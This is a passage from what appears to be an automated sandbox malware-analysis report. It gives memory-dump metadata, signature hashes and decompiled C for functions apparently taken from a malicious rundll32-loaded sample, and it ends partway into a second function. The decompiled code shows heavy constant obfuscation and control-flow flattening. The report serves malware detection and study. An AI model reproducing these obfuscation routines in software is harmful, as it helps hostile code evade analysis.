                                                                      0x00000000
                                                                      0x01ff6ef0
                                                                      0x01ff6ef6
                                                                      0x01ff6f66
                                                                      0x01ff6f6f
                                                                      0x01ff6f75
                                                                      0x01ff6f76
                                                                      0x00000000
                                                                      0x01ff6ef8
                                                                      0x01ff6efe
                                                                      0x00000000
                                                                      0x01ff6f04
                                                                      0x01ff6f04
                                                                      0x01ff6f31
                                                                      0x01ff6f38
                                                                      0x01ff6f3d
                                                                      0x01ff6f44
                                                                      0x01ff6f4c
                                                                      0x00000000
                                                                      0x01ff6f4c
                                                                      0x01ff6efe
                                                                      0x01ff6ef6
                                                                      0x01ff6eea
                                                                      0x01ff6ee2
                                                                      0x01ff6ed6
                                                                      0x01ff71b6
                                                                      0x01ff71c2
                                                                      0x01ff71c2
                                                                      0x01ff70be
                                                                      0x01ff717d
                                                                      0x01ff7186
                                                                      0x01ff718c
                                                                      0x01ff718d
                                                                      0x00000000
                                                                      0x01ff70c4
                                                                      0x01ff70ca
                                                                      0x01ff71a6
                                                                      0x01ff71b0
                                                                      0x01ff70d0
                                                                      0x01ff70d6
                                                                      0x01ff7151
                                                                      0x01ff7152
                                                                      0x01ff7157
                                                                      0x01ff715c
                                                                      0x01ff715f
                                                                      0x01ff7161
                                                                      0x00000000
                                                                      0x01ff7161
                                                                      0x01ff70d8
                                                                      0x01ff70de
                                                                      0x00000000
                                                                      0x01ff70e4
                                                                      0x01ff7128
                                                                      0x01ff712b
                                                                      0x01ff7130
                                                                      0x01ff7137
                                                                      0x01ff713f
                                                                      0x00000000
                                                                      0x01ff713f
                                                                      0x01ff70de
                                                                      0x01ff70d6
                                                                      0x01ff70ca
                                                                      0x00000000
                                                                      0x01ff718f
                                                                      0x01ff718f
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X$(/$C$G$H_M-$O$S$So$VK$[O$\u$|D$n
                                                                      • API String ID: 0-3751547790
                                                                      • Opcode ID: cffedc16fa4a98ebc818ae339d1f7c4b82920c7a7f2c874a8d210271b974dd61
                                                                      • Instruction ID: 7fc809b068bb9561b1b20ca1ef7bfbf167591e0f999cb53f7a38cc5c823baa82
                                                                      • Opcode Fuzzy Hash: cffedc16fa4a98ebc818ae339d1f7c4b82920c7a7f2c874a8d210271b974dd61
                                                                      • Instruction Fuzzy Hash: 6A322672508380DFE364CF25C989A5BFBE2BBC4314F008A1DE6D9962A0D7B58909CF57
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00235D63, Relevance: 16.7, Strings: 13, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X$(/$C$G$H_M-$O$S$So$VK$[O$\u$|D$n
                                                                      • API String ID: 0-3751547790
                                                                      • Opcode ID: 3611825db6a2aab109563487e6713e2aae04b2736a19930fcaf3afc537ff330c
                                                                      • Instruction ID: 5ccc9f8bd470f45de5e8a6921fe4019ad1341556b0a95bcf76d9e9d11b18157d
                                                                      • Opcode Fuzzy Hash: 3611825db6a2aab109563487e6713e2aae04b2736a19930fcaf3afc537ff330c
                                                                      • Instruction Fuzzy Hash: DD3225B1508381DFE368CF25C989A4BFBE1BBC4308F10891DE6D9962A0D7B59919CF53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF240F, Relevance: 16.7, Strings: 13, Instructions: 442COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E01FF240F(intOrPtr __ecx, signed int __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				unsigned int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _t472;
				void* _t476;
				void* _t480;
				intOrPtr* _t485;
				intOrPtr _t486;
				intOrPtr* _t488;
				void* _t494;
				intOrPtr* _t497;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t516;
				signed int _t519;
				signed int _t564;
				intOrPtr* _t565;
				signed int _t566;
				intOrPtr _t570;
				void* _t571;
				void* _t572;
				void* _t575;

				_v544 = __edx;
				_t570 = __ecx;
				_v548 = _v548 & 0x00000000;
				_v576 = 0x3ff0;
				_v576 = _v576 ^ 0x9e7bb91e;
				_v576 = _v576 ^ 0x9c7b86ee;
				_v692 = 0xaef0;
				_v692 = _v692 + 0xffffcefc;
				_v692 = _v692 >> 0xe;
				_v692 = _v692 + 0xe475;
				_v692 = _v692 ^ 0x00008036;
				_v604 = 0xa47c;
				_v604 = _v604 | 0xf2af965e;
				_v604 = _v604 ^ 0xf2aff58b;
				_v684 = 0xd40f;
				_v684 = _v684 ^ 0x5c880073;
				_v684 = _v684 + 0xffff2d46;
				_v684 = _v684 + 0x9a08;
				_v684 = _v684 ^ 0x5c88f0b5;
				_v676 = 0x197b;
				_v676 = _v676 + 0xef0f;
				_v676 = _v676 | 0x9fafbede;
				_v676 = _v676 ^ 0x9fafba55;
				_v636 = 0x6087;
				_v636 = _v636 ^ 0xfc35d72d;
				_v636 = _v636 * 0x5c;
				_v636 = _v636 ^ 0xa34e606a;
				_t566 = 0x20234bc;
				_v612 = 0xefe3;
				_v612 = _v612 ^ 0x3ca49539;
				_t506 = 0x3c;
				_v612 = _v612 * 0x15;
				_v612 = _v612 ^ 0xf97e0d4d;
				_v668 = 0xac56;
				_v668 = _v668 << 0x10;
				_v668 = _v668 + 0x99a;
				_v668 = _v668 + 0xbf11;
				_v668 = _v668 ^ 0xac56db40;
				_v584 = 0xe1f0;
				_v584 = _v584 | 0x72c35923;
				_v584 = _v584 ^ 0x72c3ed92;
				_v620 = 0xe61b;
				_v620 = _v620 + 0x2c24;
				_v620 = _v620 / _t506;
				_v620 = _v620 ^ 0x00007f0c;
				_v628 = 0x58a0;
				_t507 = 0x65;
				_v628 = _v628 / _t507;
				_t508 = 0x1e;
				_v628 = _v628 / _t508;
				_v628 = _v628 ^ 0x00007423;
				_v592 = 0x80dd;
				_v592 = _v592 ^ 0xdc543aa4;
				_v592 = _v592 ^ 0xdc54f390;
				_v600 = 0x5ccb;
				_v600 = _v600 >> 8;
				_v600 = _v600 ^ 0x00007813;
				_v616 = 0xd1a2;
				_v616 = _v616 >> 7;
				_v616 = _v616 >> 0xc;
				_v616 = _v616 ^ 0x00001864;
				_v728 = 0xbeeb;
				_v728 = _v728 << 0xf;
				_t509 = 0x23;
				_v728 = _v728 / _t509;
				_t510 = 0x3b;
				_v728 = _v728 * 0x5f;
				_v728 = _v728 ^ 0x031a06f0;
				_v648 = 0x1000;
				_v648 = _v648 * 0x2f;
				_v648 = _v648 + 0xb758;
				_v648 = _v648 ^ 0x0003bc82;
				_v696 = 0x58c3;
				_v696 = _v696 << 0xd;
				_v696 = _v696 >> 2;
				_v696 = _v696 >> 6;
				_v696 = _v696 ^ 0x000b0542;
				_v680 = 0x7bce;
				_v680 = _v680 + 0xffffd7b2;
				_v680 = _v680 ^ 0x9276ba2e;
				_v680 = _v680 * 0x4f;
				_v680 = _v680 ^ 0x32b2725f;
				_v556 = 0x37b8;
				_v556 = _v556 * 0x50;
				_v556 = _v556 ^ 0x001156bf;
				_v624 = 0xc402;
				_v624 = _v624 / _t510;
				_t511 = 0x3f;
				_t502 = 6;
				_v624 = _v624 * 0x78;
				_v624 = _v624 ^ 0x0001b435;
				_v580 = 0xacb9;
				_v580 = _v580 + 0xffffe8bf;
				_v580 = _v580 ^ 0x0000921f;
				_v640 = 0x79b0;
				_v640 = _v640 ^ 0x08b585e1;
				_v640 = _v640 + 0x1e13;
				_v640 = _v640 ^ 0x08b608dd;
				_v572 = 0x1f93;
				_v572 = _v572 | 0xb873ffd6;
				_v572 = _v572 ^ 0xb873c7ec;
				_v656 = 0x9e22;
				_v656 = _v656 + 0xffffc50b;
				_v656 = _v656 / _t511;
				_v656 = _v656 ^ 0x000014c8;
				_v724 = 0xa715;
				_v724 = _v724 / _t502;
				_v724 = _v724 ^ 0x8b24d62d;
				_t564 = 0x4f;
				_v724 = _v724 / _t564;
				_v724 = _v724 ^ 0x01c292ff;
				_v632 = 0x3883;
				_v632 = _v632 >> 7;
				_v632 = _v632 >> 4;
				_v632 = _v632 ^ 0x0000065c;
				_v700 = 0x32e6;
				_v700 = _v700 >> 0xa;
				_v700 = _v700 + 0x4acf;
				_v700 = _v700 * 0x69;
				_v700 = _v700 ^ 0x001eedb7;
				_v708 = 0x1f64;
				_v708 = _v708 + 0xffff18ab;
				_v708 = _v708 ^ 0xe318c4e8;
				_v708 = _v708 | 0x6f3290f4;
				_v708 = _v708 ^ 0x7ff7d0c6;
				_v644 = 0xc1fd;
				_v644 = _v644 | 0x2cccc8d2;
				_t512 = 0x64;
				_v644 = _v644 / _t512;
				_v644 = _v644 ^ 0x0072df32;
				_v716 = 0x696f;
				_v716 = _v716 ^ 0x72776147;
				_v716 = _v716 + 0xffffc5d0;
				_v716 = _v716 ^ 0x7276e505;
				_v596 = 0x8ab4;
				_t513 = 0x62;
				_v596 = _v596 / _t513;
				_v596 = _v596 ^ 0x00003466;
				_v560 = 0x3fc9;
				_v560 = _v560 / _t564;
				_v560 = _v560 ^ 0x00003d0e;
				_v720 = 0xf9fd;
				_v720 = _v720 | 0x59d895f3;
				_v720 = _v720 + 0xffffef32;
				_v720 = _v720 | 0x9c01a373;
				_v720 = _v720 ^ 0xddd9e3b5;
				_v564 = 0x533a;
				_t514 = 0x7b;
				_v564 = _v564 / _t514;
				_v564 = _v564 ^ 0x0000101a;
				_v664 = 0xcaf9;
				_v664 = _v664 | 0x8246bf69;
				_v664 = _v664 ^ 0xe3049bde;
				_v664 = _v664 ^ 0x274f5234;
				_v664 = _v664 ^ 0x460d6397;
				_v588 = 0xa2a1;
				_v588 = _v588 | 0xd21325c9;
				_v588 = _v588 ^ 0xd213d3a4;
				_v688 = 0xb83d;
				_v688 = _v688 + 0xffff84b7;
				_v688 = _v688 + 0xe0b4;
				_v688 = _v688 + 0xd09;
				_v688 = _v688 ^ 0x00013826;
				_v652 = 0xd037;
				_t515 = 0x7e;
				_v652 = _v652 / _t515;
				_v652 = _v652 + 0xffff26c9;
				_v652 = _v652 ^ 0xffff70bd;
				_v608 = 0x4293;
				_v608 = _v608 << 0xc;
				_v608 = _v608 ^ 0x042926c6;
				_v704 = 0xcab7;
				_v704 = _v704 << 9;
				_v704 = _v704 >> 4;
				_t472 = _v704;
				_t558 = _t472 % _t502;
				_v704 = _t472 / _t502;
				_v704 = _v704 ^ 0x00045174;
				_v552 = 0xb8b4;
				_t565 = _v544;
				_t503 = _v544;
				_v552 = _v552 * 0x4e;
				_v552 = _v552 ^ 0x00387999;
				_v672 = 0x2bf0;
				_v672 = _v672 | 0xf60bc9fe;
				_v672 = _v672 + 0x57d1;
				_v672 = _v672 ^ 0xf60c66e5;
				_v712 = 0x7c95;
				_v712 = _v712 + 0xffffb183;
				_v712 = _v712 | 0x5f717fbf;
				_v712 = _v712 ^ 0x5f710688;
				_v660 = 0x7905;
				_v660 = _v660 + 0x7821;
				_v660 = _v660 ^ 0x36fe040c;
				_v660 = _v660 + 0xffffb02a;
				_v660 = _v660 ^ 0x36fee51b;
				_v568 = 0x40ec;
				_v568 = _v568 * 0x31;
				_v568 = _v568 ^ 0x000c4283;
				while(1) {
					L1:
					_t476 = 0x32edf131;
					while(1) {
						L2:
						_t516 = 0x12c173de;
						do {
							while(1) {
								L3:
								_t575 = _t566 - 0x298a7590;
								if(_t575 <= 0) {
									break;
								}
								__eflags = _t566 - 0x2feccba1;
								if(_t566 == 0x2feccba1) {
									__eflags = _t503 - _t476;
									if(_t503 != _t476) {
										_t566 = 0x38a72f3e;
										goto L30;
									} else {
										_push(_v584);
										_push(_v668);
										_t558 = _v612;
										E01FF3336(_v576, _v612, _t516,  &_v548, _t516);
										_t571 = _t571 + 0x14;
										asm("sbb esi, esi");
										_t566 = (_t566 & 0x0682b5e8) + 0x32247956;
										while(1) {
											L1:
											_t476 = 0x32edf131;
											L2:
											_t516 = 0x12c173de;
											goto L3;
										}
									}
								} else {
									__eflags = _t566 - 0x32247956;
									if(_t566 == 0x32247956) {
										return E01FFDE81(_v660, _t565, _v568);
									}
									__eflags = _t566 - 0x38a72f3e;
									if(_t566 != 0x38a72f3e) {
										goto L30;
									} else {
										_t558 = _v544;
										_push( &_v524);
										_push(0x1ff1020);
										_t497 = E0200B165(_t570, _v544);
										__eflags = _t497;
										_t476 = 0x32edf131;
										if(_t497 == 0) {
											__eflags = _t503 - 0x32edf131;
											if(__eflags == 0) {
												_t558 = _v628;
												E01FFF1ED(_v620, _v628, _v592, _v600, _v548);
												_t571 = _t571 + 0xc;
												_t476 = 0x32edf131;
											}
											_t566 = 0x32247956;
											while(1) {
												L2:
												_t516 = 0x12c173de;
												goto L3;
											}
										} else {
											__eflags = _t503 - 0x32edf131;
											_t516 = 0x12c173de;
											_t566 =  ==  ? 0x12c173de : 0x13c1a9f6;
											continue;
										}
									}
								}
								L34:
								return _t485;
							}
							if(_t575 == 0) {
								_t480 = E01FFF2AB();
								__eflags = E02001DFE(_t558) - _t480;
								_t476 = 0x32edf131;
								_t566 = 0x2feccba1;
								_t503 =  !=  ? 0x32edf131 : 0x251cf005;
								goto L2;
							}
							if(_t566 != 0x20234bc) {
								if(_t566 == 0x31b2709) {
									 *((intOrPtr*)(_t565 + 0x44)) = _t570;
									_t486 =  *0x2011084;
									 *_t565 = _t486;
									 *0x2011084 = _t565;
									return _t486;
								}
								if(_t566 == _t516) {
									_push( &_v540);
									_push(_t516);
									_t488 = E020093AA(_v616,  &_v524, _t516, _v548, _v728, _v648, _v696, _v680);
									_t572 = _t571 + 0x20;
									__eflags = _t488;
									if(_t488 != 0) {
										E01FFF1ED(_v556, _v624, _v580, _v640, _v540);
										E01FFF1ED(_v572, _v656, _v724, _v632, _v536);
										_t572 = _t572 + 0x18;
									}
									_push(_v548);
									_push(_v716);
									_push(_v644);
									_t558 = _v708;
									_t519 = _v700;
									goto L11;
								} else {
									_t579 = _t566 - 0x13c1a9f6;
									if(_t566 != 0x13c1a9f6) {
										goto L30;
									} else {
										_push(0);
										_push(0);
										_push(_v664);
										_push(_v564);
										_push(_v720);
										_push(_v560);
										_t558 = _v596;
										_push( &_v524);
										_push( &_v540);
										_t494 = E01FF6417(_v596, _t579);
										_t571 = _t571 + 0x20;
										if(_t494 != 0) {
											E01FFF1ED(_v588, _v688, _v652, _v608, _v540);
											_t572 = _t571 + 0xc;
											_push(_v536);
											_push(_v712);
											_push(_v672);
											_t558 = _v552;
											_t519 = _v704;
											L11:
											E01FFF1ED(_t519, _t558);
											_t571 = _t572 + 0xc;
										}
										_t566 = 0x31b2709;
										while(1) {
											L1:
											_t476 = 0x32edf131;
											goto L2;
										}
									}
								}
								goto L34;
							}
							_push(_t516);
							_t558 = 0x50;
							_t485 = E01FF54FB(_t558);
							_t565 = _t485;
							__eflags = _t565;
							if(__eflags != 0) {
								_t566 = 0x298a7590;
								goto L1;
							}
							goto L34;
							L30:
							__eflags = _t566 - 0x1687916a;
						} while (__eflags != 0);
						return _t476;
					}
				}
			}


















































































                                                                      0x01ff2419
                                                                      0x01ff2420
                                                                      0x01ff2422
                                                                      0x01ff242a
                                                                      0x01ff2435
                                                                      0x01ff2440
                                                                      0x01ff244b
                                                                      0x01ff2453
                                                                      0x01ff245b
                                                                      0x01ff2460
                                                                      0x01ff2468
                                                                      0x01ff2470
                                                                      0x01ff247b
                                                                      0x01ff2486
                                                                      0x01ff2491
                                                                      0x01ff2499
                                                                      0x01ff24a1
                                                                      0x01ff24a9
                                                                      0x01ff24b1
                                                                      0x01ff24b9
                                                                      0x01ff24c1
                                                                      0x01ff24c9
                                                                      0x01ff24d1
                                                                      0x01ff24d9
                                                                      0x01ff24e1
                                                                      0x01ff24ee
                                                                      0x01ff24f2
                                                                      0x01ff24fa
                                                                      0x01ff24ff
                                                                      0x01ff250a
                                                                      0x01ff2521
                                                                      0x01ff2524
                                                                      0x01ff252b
                                                                      0x01ff2536
                                                                      0x01ff253e
                                                                      0x01ff2543
                                                                      0x01ff254b
                                                                      0x01ff2553
                                                                      0x01ff255b
                                                                      0x01ff2566
                                                                      0x01ff2571
                                                                      0x01ff257c
                                                                      0x01ff2587
                                                                      0x01ff259d
                                                                      0x01ff25a4
                                                                      0x01ff25af
                                                                      0x01ff25bb
                                                                      0x01ff25c0
                                                                      0x01ff25ca
                                                                      0x01ff25cd
                                                                      0x01ff25d1
                                                                      0x01ff25d9
                                                                      0x01ff25e4
                                                                      0x01ff25ef
                                                                      0x01ff25fa
                                                                      0x01ff2605
                                                                      0x01ff260d
                                                                      0x01ff2618
                                                                      0x01ff2623
                                                                      0x01ff262b
                                                                      0x01ff2633
                                                                      0x01ff263e
                                                                      0x01ff2646
                                                                      0x01ff2653
                                                                      0x01ff2658
                                                                      0x01ff2663
                                                                      0x01ff2666
                                                                      0x01ff266a
                                                                      0x01ff2672
                                                                      0x01ff267f
                                                                      0x01ff2683
                                                                      0x01ff268b
                                                                      0x01ff2693
                                                                      0x01ff269b
                                                                      0x01ff26a0
                                                                      0x01ff26a5
                                                                      0x01ff26aa
                                                                      0x01ff26b2
                                                                      0x01ff26ba
                                                                      0x01ff26c2
                                                                      0x01ff26cf
                                                                      0x01ff26d3
                                                                      0x01ff26db
                                                                      0x01ff26ee
                                                                      0x01ff26f5
                                                                      0x01ff2700
                                                                      0x01ff2716
                                                                      0x01ff2725
                                                                      0x01ff2728
                                                                      0x01ff272b
                                                                      0x01ff2732
                                                                      0x01ff273d
                                                                      0x01ff2748
                                                                      0x01ff2753
                                                                      0x01ff275e
                                                                      0x01ff2766
                                                                      0x01ff276e
                                                                      0x01ff2776
                                                                      0x01ff277e
                                                                      0x01ff2789
                                                                      0x01ff2794
                                                                      0x01ff279f
                                                                      0x01ff27a7
                                                                      0x01ff27b7
                                                                      0x01ff27bb
                                                                      0x01ff27c3
                                                                      0x01ff27d3
                                                                      0x01ff27d7
                                                                      0x01ff27e3
                                                                      0x01ff27e6
                                                                      0x01ff27ea
                                                                      0x01ff27f2
                                                                      0x01ff27fa
                                                                      0x01ff27ff
                                                                      0x01ff2804
                                                                      0x01ff280c
                                                                      0x01ff2814
                                                                      0x01ff2819
                                                                      0x01ff2826
                                                                      0x01ff282c
                                                                      0x01ff2834
                                                                      0x01ff283c
                                                                      0x01ff2844
                                                                      0x01ff284c
                                                                      0x01ff2854
                                                                      0x01ff285c
                                                                      0x01ff2864
                                                                      0x01ff2872
                                                                      0x01ff2877
                                                                      0x01ff287b
                                                                      0x01ff2883
                                                                      0x01ff288b
                                                                      0x01ff289b
                                                                      0x01ff28a3
                                                                      0x01ff28ab
                                                                      0x01ff28bf
                                                                      0x01ff28c4
                                                                      0x01ff28cb
                                                                      0x01ff28d6
                                                                      0x01ff28ec
                                                                      0x01ff28f3
                                                                      0x01ff28fe
                                                                      0x01ff2906
                                                                      0x01ff290e
                                                                      0x01ff2916
                                                                      0x01ff291e
                                                                      0x01ff2926
                                                                      0x01ff293a
                                                                      0x01ff293f
                                                                      0x01ff2946
                                                                      0x01ff2951
                                                                      0x01ff2959
                                                                      0x01ff2961
                                                                      0x01ff2969
                                                                      0x01ff2971
                                                                      0x01ff2979
                                                                      0x01ff2984
                                                                      0x01ff298f
                                                                      0x01ff299a
                                                                      0x01ff29a2
                                                                      0x01ff29aa
                                                                      0x01ff29b2
                                                                      0x01ff29ba
                                                                      0x01ff29c2
                                                                      0x01ff29d0
                                                                      0x01ff29d5
                                                                      0x01ff29d9
                                                                      0x01ff29e1
                                                                      0x01ff29e9
                                                                      0x01ff29f4
                                                                      0x01ff29fc
                                                                      0x01ff2a07
                                                                      0x01ff2a0f
                                                                      0x01ff2a14
                                                                      0x01ff2a19
                                                                      0x01ff2a1d
                                                                      0x01ff2a1f
                                                                      0x01ff2a23
                                                                      0x01ff2a2b
                                                                      0x01ff2a3e
                                                                      0x01ff2a45
                                                                      0x01ff2a4c
                                                                      0x01ff2a53
                                                                      0x01ff2a5e
                                                                      0x01ff2a66
                                                                      0x01ff2a6e
                                                                      0x01ff2a76
                                                                      0x01ff2a7e
                                                                      0x01ff2a86
                                                                      0x01ff2a8e
                                                                      0x01ff2a96
                                                                      0x01ff2a9e
                                                                      0x01ff2aa6
                                                                      0x01ff2aae
                                                                      0x01ff2ab6
                                                                      0x01ff2abe
                                                                      0x01ff2ac6
                                                                      0x01ff2ad9
                                                                      0x01ff2ae0
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2af0
                                                                      0x01ff2af0
                                                                      0x01ff2af0
                                                                      0x01ff2af5
                                                                      0x01ff2af5
                                                                      0x01ff2af5
                                                                      0x01ff2af5
                                                                      0x01ff2afb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff2cbc
                                                                      0x01ff2cc2
                                                                      0x01ff2d58
                                                                      0x01ff2d5a
                                                                      0x01ff2d9c
                                                                      0x00000000
                                                                      0x01ff2d5c
                                                                      0x01ff2d5c
                                                                      0x01ff2d6a
                                                                      0x01ff2d6e
                                                                      0x01ff2d7f
                                                                      0x01ff2d84
                                                                      0x01ff2d89
                                                                      0x01ff2d91
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2af0
                                                                      0x01ff2af0
                                                                      0x00000000
                                                                      0x01ff2af0
                                                                      0x01ff2aeb
                                                                      0x01ff2cc8
                                                                      0x01ff2cc8
                                                                      0x01ff2cce
                                                                      0x00000000
                                                                      0x01ff2dd3
                                                                      0x01ff2cd4
                                                                      0x01ff2cda
                                                                      0x00000000
                                                                      0x01ff2ce0
                                                                      0x01ff2ce0
                                                                      0x01ff2cee
                                                                      0x01ff2cef
                                                                      0x01ff2cf6
                                                                      0x01ff2cfc
                                                                      0x01ff2cfe
                                                                      0x01ff2d04
                                                                      0x01ff2d1a
                                                                      0x01ff2d1c
                                                                      0x01ff2d33
                                                                      0x01ff2d41
                                                                      0x01ff2d46
                                                                      0x01ff2d49
                                                                      0x01ff2d49
                                                                      0x01ff2d4e
                                                                      0x01ff2af0
                                                                      0x01ff2af0
                                                                      0x01ff2af0
                                                                      0x00000000
                                                                      0x01ff2af0
                                                                      0x01ff2d06
                                                                      0x01ff2d06
                                                                      0x01ff2d0d
                                                                      0x01ff2d12
                                                                      0x00000000
                                                                      0x01ff2d12
                                                                      0x01ff2d04
                                                                      0x01ff2cda
                                                                      0x01ff2dde
                                                                      0x01ff2dde
                                                                      0x01ff2dde
                                                                      0x01ff2b01
                                                                      0x01ff2c97
                                                                      0x01ff2ca3
                                                                      0x01ff2caa
                                                                      0x01ff2caf
                                                                      0x01ff2cb4
                                                                      0x00000000
                                                                      0x01ff2cb4
                                                                      0x01ff2b0d
                                                                      0x01ff2b19
                                                                      0x01ff2daf
                                                                      0x01ff2db2
                                                                      0x01ff2db7
                                                                      0x01ff2db9
                                                                      0x00000000
                                                                      0x01ff2db9
                                                                      0x01ff2b21
                                                                      0x01ff2bc8
                                                                      0x01ff2bc9
                                                                      0x01ff2bf0
                                                                      0x01ff2bf5
                                                                      0x01ff2bf8
                                                                      0x01ff2bfa
                                                                      0x01ff2c1c
                                                                      0x01ff2c3e
                                                                      0x01ff2c43
                                                                      0x01ff2c43
                                                                      0x01ff2c46
                                                                      0x01ff2c4d
                                                                      0x01ff2c51
                                                                      0x01ff2c55
                                                                      0x01ff2c59
                                                                      0x00000000
                                                                      0x01ff2b27
                                                                      0x01ff2b27
                                                                      0x01ff2b2d
                                                                      0x00000000
                                                                      0x01ff2b33
                                                                      0x01ff2b33
                                                                      0x01ff2b35
                                                                      0x01ff2b37
                                                                      0x01ff2b42
                                                                      0x01ff2b49
                                                                      0x01ff2b4d
                                                                      0x01ff2b54
                                                                      0x01ff2b5b
                                                                      0x01ff2b63
                                                                      0x01ff2b64
                                                                      0x01ff2b69
                                                                      0x01ff2b6e
                                                                      0x01ff2b8d
                                                                      0x01ff2b92
                                                                      0x01ff2b95
                                                                      0x01ff2b9c
                                                                      0x01ff2ba0
                                                                      0x01ff2ba4
                                                                      0x01ff2bab
                                                                      0x01ff2baf
                                                                      0x01ff2baf
                                                                      0x01ff2bb4
                                                                      0x01ff2bb4
                                                                      0x01ff2bb7
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x00000000
                                                                      0x01ff2aeb
                                                                      0x01ff2aeb
                                                                      0x01ff2b2d
                                                                      0x00000000
                                                                      0x01ff2b21
                                                                      0x01ff2c6d
                                                                      0x01ff2c70
                                                                      0x01ff2c71
                                                                      0x01ff2c76
                                                                      0x01ff2c79
                                                                      0x01ff2c7b
                                                                      0x01ff2c81
                                                                      0x00000000
                                                                      0x01ff2c81
                                                                      0x00000000
                                                                      0x01ff2da1
                                                                      0x01ff2da1
                                                                      0x01ff2da1
                                                                      0x00000000
                                                                      0x01ff2af5
                                                                      0x01ff2af0

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
                                                                      • API String ID: 0-1200869751
                                                                      • Opcode ID: d203c129e0a52e4d6abee3b69769fa3786be56ad036ec8c3a973cbfcde8927ff
                                                                      • Instruction ID: d9da8d0c34533fecded6b6db702f30fd96d579a24771f076fd35e6938bf3e0f5
                                                                      • Opcode Fuzzy Hash: d203c129e0a52e4d6abee3b69769fa3786be56ad036ec8c3a973cbfcde8927ff
                                                                      • Instruction Fuzzy Hash: 3B32F372908381DFE368CF25C585A9BBBE2BFC4344F10891DE699962A0D7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00231983, Relevance: 16.7, Strings: 13, Instructions: 442COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
                                                                      • API String ID: 0-1200869751
                                                                      • Opcode ID: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
                                                                      • Instruction ID: 0e2194ec2e3f4c3580be536eb47724fa45bb1ba03d21a2c9d8c0381fa4a5a795
                                                                      • Opcode Fuzzy Hash: 113ba5cbdea58830c0e016ea2be18b6fe50078e30343529e1375b1d1c372b620
                                                                      • Instruction Fuzzy Hash: 4D3224B1508381DFE368CF25C589A8BFBE2BBC4304F10891DE6D9962A1D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFCAA3, Relevance: 16.6, Strings: 13, Instructions: 375COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E01FFCAA3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
